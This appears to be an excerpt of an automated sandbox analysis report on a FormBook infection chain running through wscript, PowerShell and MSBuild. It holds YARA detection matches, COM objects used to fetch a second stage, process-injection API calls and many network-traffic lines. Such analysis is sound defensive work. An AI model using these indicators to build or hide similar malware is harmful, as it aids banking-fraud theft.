                  Source: choice.exe, 0000000A.00000003.2388557028.0000000002D39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: wscript.exe, 00000000.00000002.2398543416.00000237612CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2390641520.00000237612CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2389902837.00000237610B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1963200942.00000282872F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: choice.exe, 0000000A.00000003.2388557028.0000000002D39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: wscript.exe, 00000000.00000002.2398543416.00000237612CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2390641520.00000237612CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2389902837.00000237610B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1963200942.00000282872F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                  Source: wscript.exe, 00000000.00000002.2398543416.00000237612CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2390641520.00000237612CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2389902837.00000237610B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1963200942.00000282872F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
                  Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.4:49738 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49739 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49802 version: TLS 1.2

                  E-Banking Fraud

                  barindex
                  Yara detected FormBook
                  Source: Yara matchFile source: 9.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.2951402841.0000000004770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2951435333.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2570201674.0000000006950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2184961548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2950913668.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: Process Memory Space: powershell.exe PID: 7464, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeCode function: 0_2_02D4F6B2 SleepEx,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_02D4F6B2
                  Source: C:\Windows\System32\wscript.exeCode function: 0_2_02D4F9BE SleepEx,NtResumeThread,0_2_02D4F9BE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0042CB03 NtClose,9_2_0042CB03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D2B60 NtClose,LdrInitializeThunk,9_2_013D2B60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D2DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_013D2DF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D2C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_013D2C70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D2CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_013D2CA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D2F90 NtProtectVirtualMemory,LdrInitializeThunk,9_2_013D2F90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D35C0 NtCreateMutant,LdrInitializeThunk,9_2_013D35C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D4340 NtSetContextThread,9_2_013D4340
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D4650 NtSuspendThread,9_2_013D4650
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D2BA0 NtEnumerateValueKey,9_2_013D2BA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D2B80 NtQueryInformationFile,9_2_013D2B80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D2BF0 NtAllocateVirtualMemory,9_2_013D2BF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D2BE0 NtQueryValueKey,9_2_013D2BE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D2AB0 NtWaitForSingleObject,9_2_013D2AB0
